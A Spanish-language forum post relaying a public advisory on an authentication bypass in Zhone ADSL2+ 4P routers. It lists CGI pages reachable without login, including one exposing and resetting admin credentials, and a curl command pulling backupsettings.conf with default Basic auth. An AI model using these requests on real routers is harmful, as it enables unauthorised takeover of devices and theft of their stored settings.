Obtención de privilegios roots en Zhone ADSL2+ 4P

kcdtv · 05-09-2015 11:10:11

Obtención de privilegios de administrador en la gama Zhone ADSL2+ 4P

No conocía a la marca Zhone.

Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias madres; son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850) big_smile
Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
La información fue también puesta en packet storm:

Zhone ADSL2+ 4P Authentiation Bypass / … Disclosure

¿Quieres ser root?

Puedes acceder a estas tres paginas mediante http sin conocer los credenciales

http://[LOCALHOST]:?/pvccfg.cgi
http://[LOCALHOST]:?/dnscfg.cgi
http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)

En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador.
Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.
```
curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" 
```
( ("dXNlcjp1c2Vy" = "user:user" en base64))

Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.

Tema	Respuestas	Vistas	Ultimo mensaje
como hacer un soporte casero para el soldador. por crash	12	251	Ayer 17:07:49 por josep345
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 12 ]	289	14428	Ayer 15:58:35 por kcdtv
Pegado: Pegado:: 1ª Sorteo Del Mercadillo por josep345 [ 1 2 3 4 5 ]	124	2836	16-06-2018 10:55:15 por josep345
Asrock 775i945GZ por josep345	4	92	15-06-2018 19:42:37 por josep345
para que sirve el comando info por crash	7	136	15-06-2018 16:00:27 por josep345

Foro Wifi-libre.com

Anuncio

#1 05-09-2015 11:10:11